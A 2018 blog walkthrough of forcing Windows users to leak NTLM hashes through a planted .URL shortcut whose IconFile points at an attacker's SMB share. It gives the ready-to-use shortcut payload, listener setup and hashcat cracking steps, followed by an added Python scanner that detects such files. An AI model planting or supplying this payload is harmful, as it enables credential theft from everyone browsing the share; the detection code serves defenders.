A better way to capture hashes with no user interaction by @_markmo_

Mark Mo
Sep 24, 2018 · 3 min read

I found a better way to capture hashes from a post by @insertscript on Twitter.

This uses a .URL file that accesses environment variables and causes the user to connect to the attacker's file share without any user interaction. Here is the quote from @insertscript: “As soon as explorer.exe views a folder, which contains a .URL file, it will lookup any specified environment variable like %PATH% or %USERNAME% before sending the actual request, therefore leaking its content to the attacker controlled server.” (https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html)

Right, first we set up an SMB listener on our attacking machine (probably on an internal network, as most companies block outbound SMB).

Next we create a text file on a file share, hopefully somewhere with a lot of traffic, like shared documents. (Once you create the file you can drop it on any share.)

Paste this into the text file:
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\PutYourSmbListenerShareHere\%USERNAME%.icon
IconIndex=1

You only need to replace the IconFile path with the share you set up in the first step with SMBServer, Responder or Inveigh.
***PLEASE NOTE*** Leave the %USERNAME%.icon exactly where it is. This is what initiates the connection.

Here is what it should look like when you are done

Now, make sure you have view file extensions and hidden files on.

Rename your file with a .URL extension and the magic will begin.

It should look like this when you are done

You should ALREADY have a connection in your SMB listener!

Now anyone that visits that share will attempt to automatically authenticate to your SMB listener. If you want to be extra sneaky change the icon of your .URL file. Also, see the notes at the end.

Now to crack with hashcat. Copy the hash

Paste it into a file (I’m just echoing it to a file)

Run hashcat and hopefully the password is in your password list

Hooray Cracked It!

Huge thanks to @insertscript for sharing that info.

Feel free to follow me on Twitter @_markmo_

I try to share what I learn as so many have done for me.

FINAL NOTE. While testing I found some weird behavior when I tried to use the same filename more than once that prevented things from working correctly. To make your life easy just create a unique filename every time (1.url, 2.url, etc).
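
For defenders, an added example that is not part of the original post: a share audit that flags .URL files whose IconFile points at a UNC path, the shape of the shortcut shown above. The function names and the host listener.example are constructed for illustration.

```python
import configparser
import re
import tempfile
from pathlib import Path

UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")   # \\host\... or //host/...
ENVVAR_RE = re.compile(r"%[^%\s\\/]+%")              # %USERNAME%, %PATH%, ...

def inspect_url_file(path):
    """Return a finding dict if the shortcut's IconFile is a UNC path, else None."""
    text = Path(path).read_bytes().decode("utf-8-sig", errors="replace")
    parser = configparser.RawConfigParser(strict=False, delimiters=("=",))
    try:
        parser.read_string(text)      # raw parser: '%' is never treated as interpolation
    except configparser.Error:
        return None                   # not a parseable shortcut file
    for section in parser.sections():
        icon = parser.get(section, "iconfile", fallback="").strip().strip('"')
        m = UNC_RE.match(icon)
        if section.lower() == "internetshortcut" and m:
            return {"file": str(path), "iconfile": icon, "host": m.group(1),
                    "leaks_env": bool(ENVVAR_RE.search(icon))}
    return None

def scan_share(root):
    """Walk a directory tree and inspect every *.url file (extension case-insensitive)."""
    hits = (inspect_url_file(p) for p in Path(root).rglob("*")
            if p.is_file() and p.suffix.lower() == ".url")
    return [h for h in hits if h]

def demo():
    """Constructed samples: one file shaped like the post's, one benign local icon."""
    samples = {
        "1.url": "[InternetShortcut]\nURL=whatever\nWorkingDirectory=whatever\n"
                 "IconFile=\\\\listener.example\\%USERNAME%.icon\nIconIndex=1\n",
        "ok.url": "[InternetShortcut]\nURL=https://example.com/\n"
                  "IconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=1\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            (Path(root) / name).write_text(body)
        return [(Path(f["file"]).name, f["host"], f["leaks_env"]) for f in scan_share(root)]

if __name__ == "__main__":
    print(demo())
```

Point scan_share at the root of a mounted share; a finding with leaks_env set matches the %USERNAME% pattern from the post, and the host field is the machine the shortcut makes viewers connect to.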
